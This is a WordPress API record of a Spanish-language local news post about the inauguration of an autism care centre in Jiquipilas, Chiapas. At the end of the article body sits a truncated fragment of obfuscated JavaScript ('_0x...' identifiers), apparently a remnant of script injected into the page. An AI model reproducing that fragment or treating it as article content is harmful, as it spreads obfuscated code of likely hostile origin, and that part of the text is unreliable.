{"id":13527,"date":"2024-01-10T23:21:34","date_gmt":"2024-01-10T23:21:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13527"},"modified":"2024-01-10T23:21:35","modified_gmt":"2024-01-10T23:21:35","slug":"madely-montejo-asiste-a-la-inauguracion-del-centro-de-atencion-autista","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13527","title":{"rendered":"Madely Montejo asiste a la inauguraci\u00f3n del Centro de Atenci\u00f3n Autista"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240110-WA0013-768x1024.jpg\" alt=\"\" class=\"wp-image-13528\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240110-WA0013-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240110-WA0013-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240110-WA0013-1152x1536.jpg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240110-WA0013-1536x2048.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240110-WA0013-scaled.jpg 1920w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jiquipilas, Chiapas.- La Presidenta del sistema DIF Madely Montejo Maza expres\u00f3 su reconocimiento al Gobernador Rutilio Escand\u00f3n Cadenas y a DeliaMaria Gonzalez directora del DIF Chiapas durante la inauguraci\u00f3n del Centro de Atenci\u00f3n para el trastorno del Espectro Autista &#8220;Centro Azul&#8221; y del &#8220;Comedor Terap\u00e9utico Gruma&#8221;.Montejo Maza expuso que la atenci\u00f3n a ni\u00f1os y ni\u00f1as con autismo representa un apoyo fundamental para las familias que tienen estos casos, por lo que recalc\u00f3 que con la puesta en marcha de este Centro de Atenci\u00f3n muchas personas ser\u00e1n beneficiadas con este proyecto.Madely Montejo, al asistir como invitada especial a este acto dijo que en Jiquipilas a trav\u00e9s del DIF canalizan estos casos con las instancias correspondientes. &#8220;Desde nuestro municipio respaldamos la acciones del Ejecutivo Estatal Escand\u00f3n Cadenas y le decimos que vamos a seguir coordinando los programas a favor de los m\u00e1s necesitados&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jiquipilas, Chiapas.- La Presidenta del sistema DIF Madely Montejo Maza expres\u00f3 su reconocimiento al Gobernador Rutilio Escand\u00f3n Cadenas y a DeliaMaria Gonzalez directora del DIF Chiapas durante la inauguraci\u00f3n del Centro de Atenci\u00f3n para el trastorno del Espectro Autista &#8220;Centro Azul&#8221; y del &#8220;Comedor Terap\u00e9utico Gruma&#8221;.Montejo Maza expuso que la atenci\u00f3n a ni\u00f1os y ni\u00f1as &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13528,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13527","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13527","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13527"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13527\/revisions"}],"predecessor-version":[{"id":13529,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13527\/revisions\/13529"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13528"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13527"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13527"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}